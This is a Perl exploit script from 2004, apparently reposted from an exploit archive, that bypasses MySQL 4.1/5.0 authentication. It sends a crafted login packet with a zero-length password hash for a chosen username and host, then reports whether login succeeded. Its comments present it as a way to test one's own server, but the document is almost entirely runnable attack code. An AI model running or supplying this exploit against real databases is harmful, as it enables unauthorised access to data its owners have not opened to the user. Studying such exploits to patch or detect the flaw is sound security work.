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MySQL 4.1/5.0 zero-length password Auth. Bypass Exploit
======================================================= MySQL 4.1/5.0 zero-length password Auth. Bypass Exploit ======================================================= #!/usr/bin/perl # # The script connects to MySQL and attempts to log in using a zero-length password # Based on the vuln found by NGSSecurity # # The following Perl script can be used to test your version of MySQL. It will display # the login packet sent to the server and it's reply. # # Exploit copyright (c) 2004 by Eli Kara, Beyond Security # elik beyondsecurity com # use strict; use IO::Socket::INET; usage() unless ((@ARGV >= 1) || (@ARGV <= 3)); my $username = shift(@ARGV); my $host = shift(@ARGV); if (!$host) { usage(); } my $port = shift(@ARGV); if (!$port) { $port = 3306; print "Using default MySQL port (3306)\n"; } # create the socket my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); $socket or die "Cannot connect to host!\n"; # receive greeting my $reply; recv($socket, $reply, 1024, 0); if (length($reply) < 7) { print "Not allowed to connect to MySQL!\n"; exit(1); } print "Received greeting:\n"; HexDump($reply); print "\n"; # here we define the login OK reply # my $login_ok = "\x01\x00\x00\x02\xFE"; # break the username string into chars and rebuild it my $binuser = pack("C*", unpack("C*", $username)); # send login caps packet with password my $packet = "\x85\xa6". "\x03\x00\x00". "\x00". "\x00\x01\x08\x00\x00\x00". # capabilities, max packet, etc.. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00".$binuser."\x00\x14\x00\x00\x00\x00". # username and pword hash length + NULL hash "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; # continue NULL hash substr($packet, 0, 0) = pack("C1", length($packet)) . "\x00\x00\x01"; # MySQL message length + packet number (1) print "Sending caps packet:\n"; HexDump($packet); print "\n"; send $socket, $packet, 0; # receive reply recv($socket, $reply, 1024, 0); print "Received reply:\n"; HexDump($reply); my @list_bytes = unpack("C*", $reply); #print "The fifth byte is: ", $list_bytes[4], "\n"; if (length(@list_bytes) >= 4) { print "Response insufficent\n"; } #if ($reply eq $login_ok) if ($list_bytes[4] == 0 || $list_bytes[4] == 254) { print "Received OK reply, authentication successful!!\n"; } else { print "Authentication failed!\n"; } # close close($socket); sub usage { # print usage information print "\nUsage: mysql_auth_bypass_zeropass.pl <username> <host> [port]\n <username> - The DB username to authenticate as <host> - The host to connect to [port] - The TCP port which MySQL is listening on (optional, default is 3306)\n\n"; exit(1); } ### # do a hexdump of a string (assuming it's binary) ### sub HexDump { my $buffer = $_[0]; # unpack it into chars my @up = unpack("C*", $buffer); my $pos=0; # calculate matrix sizes my $rows = int(@up/16); my $leftover = int(@up%16); for( my $row=0; $row < $rows ; $row++, $pos+=16) { printf("%08X\t", $pos); my @values = @up[$pos .. $pos+15]; my @line; foreach my $val (@values) { push(@line, sprintf("%02X", $val)); } print join(' ', @line), "\n"; } # print last line printf("%08X\t", $pos); my @values = @up[$pos .. $pos+$leftover-1]; my @line; foreach my $val (@values) { push(@line, sprintf("%02X", $val)); } print join(' ', @line), "\n"; } # 0day.today [2024-11-15] #